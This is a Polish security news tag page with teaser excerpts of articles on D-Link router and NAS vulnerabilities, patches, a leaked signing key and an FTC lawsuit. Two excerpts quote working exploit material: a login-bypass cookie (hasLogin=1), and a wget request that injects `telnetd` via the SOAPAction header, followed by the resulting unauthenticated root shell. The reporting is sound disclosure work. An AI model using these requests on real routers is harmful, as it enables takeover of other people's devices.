Preorder drugiego tomu książki sekuraka: Wprowadzenie do bezpieczeństwa IT. -15% z kodem: sekurak-book

Tag: d-link

D-Link łata krytyczne błędy bezpieczeństwa w routerach

23 września 2024, 13:01 | W biegu | komentarze 2
D-Link łata krytyczne błędy bezpieczeństwa w routerach

D-Link wydał poprawione wersje firmware dla routerów COVR-X1870, DIR-X5460 oraz DIR-X4860, łącznie naprawiono 5 błędów, o poziomie krytycznym i wysokim Firma D-Link w oświadczeniu pisze: D-Link takes network security and user privacy very seriously. We have a dedicated task force and product management team on call to address evolving security issues and…

Czytaj dalej »

Uwaga na NASy od D-Linka – umożliwiają wykonanie komend

10 kwietnia 2024, 00:13 | W biegu | 0 komentarzy
Uwaga na NASy od D-Linka – umożliwiają wykonanie komend

Jeśli jesteście właścicielami starszego modelu urządzenia typu NAS firmy D-Link, przeczytajcie koniecznie – nie mamy dla Was dobrych wiadomości.  Nowy użytkownik GitHuba netsecfish (konto założone dwa tygodnie temu, posiadające jednego obserwującego oraz trzy publiczne repozytoria) udostępnił informację o podatności dotykającej wielu starszych urządzeń D-Linka z linii dysków sieciowych. Luka sklasyfikowana…

Czytaj dalej »

Można zdalnie przejąć kilka modeli routerów D-Linka. Producent: patcha nie będzie, bo nie ma już supportu

12 października 2019, 09:13 | W biegu | komentarze 4
Można zdalnie przejąć kilka modeli routerów D-Linka. Producent: patcha nie będzie, bo nie ma już supportu

Esencja tego badania jest taka: Można się uśmiechnąć pod nosem –  tego typu podatność (w pingu) to chyba najstarsza, łatwa do znalezienia i wykorzystania podatność znajdowana w urządzeniach IoT (wielokrotnie również przez nas :) Czy wymagane jest uwierzytelnienie? Powyższe żądanie HTTP zwraca stronę do logowania. Wymagane jest więc podanie loginu…

Czytaj dalej »

Amerykański FTC pozywa D-Linka za nieodpowiednie bezpieczeństwo dostarczanych urządzeń

08 stycznia 2017, 20:35 | W biegu | komentarze 4

Federalna Komisja Handlu (ang. Federal Trade Commision, FTC) złożyła pozew przeciwko producentowi D-Link oskarżając go o pozostawienie urządzeń typu routery, czy kamery internetowe podatnych na ataki. Pozew został złożony do Sądu Rejonowego w San Francisco. Nasz serwis nie raz miał do czynienia z tym producentem dlatego fakt ten nie wzbudza…

Czytaj dalej »

D-Link: nieuwierzytelniony root na routerze DSL

17 lutego 2016, 18:04 | W biegu | 0 komentarzy

Ostatnio pokazał się krótki ale treściwy opis podatności w routerze: D-Link DSL-2750B. Całość jest bezczelnie prosta do wykorzystania: wystarczy przekazać (bez uwierzytelnienia) odpowiedni parametr cli – do strony logowania, po czym uzyskujemy uprawnienia root na urządzeniu. Jeśli macie D-Linka warto sprawdzić czy nie macie podobnego problemu: –ms

Czytaj dalej »

D-Link omyłkowo udostępnił swój klucz prywatny służący do podpisu instalek

19 września 2015, 15:58 | W biegu | komentarze 4

Klucz publiczny, klucz prywatny – co za różnica… Tak chyba do tematu kryptografii podchodzi firma D-Link, która (przypadkowo?) udostępniła w swoim repozytorium GPL klucz prywatny, który może służyć do podpisu plików binarnych pod Windows. Tak podpisana binarka nie będzie wyświetlała ostrzeżenia w Windows o potencjalnie niezaufanym pliku, ładnie za to…

Czytaj dalej »

D-Link DIR-810L – aby się zalogować bez hasła wystarczy ustawić jedno cookie…

20 czerwca 2015, 10:41 | W biegu | komentarze 4

Ciekawe znalezisko w dość popularnych routerach D-linka. Analizując komunikację HTTP pomiędzy przeglądarką a routerem, autor postu znalazł w jednej z odpowiedzi od routera taki kawałek JavaScriptu: <script> document.cookie = 'hasLogin=1′; location.replace(’index.asp’); </script> Który rzeczywiście wygląda mocno podejrzanie. Dalej, po prostu (bez znajomości loginu i hasła) ustawił ww. ciastko (haslLogin=1) w…

Czytaj dalej »

Nowe D-Linki – nowy sposób na zdobycie roota bez uwierzytelnienia

11 kwietnia 2015, 12:40 | W biegu | 1 komentarz

Niedawno pisaliśmy o nowych D-Linkach, a teraz pojawiło się ciekawe badanie pokazujące w jaki sposób zrealizować nieuwierzytelniony dostęp na root-a. Wystarczy jeden prosty request HTTP… wget –header=’SOAPAction: „http://purenetworks.com/HNAP1/GetDeviceSettings/`telnetd`”’ http://192.168.0.1/HNAP1 $ telnet 192.168.0.1 Trying 192.168.0.1… Connected to 192.168.0.1. Escape character is '^]’. BusyBox v1.14.1 (2015-02-11 17:15:51 CST) built-in shell (msh) Enter…

Czytaj dalej »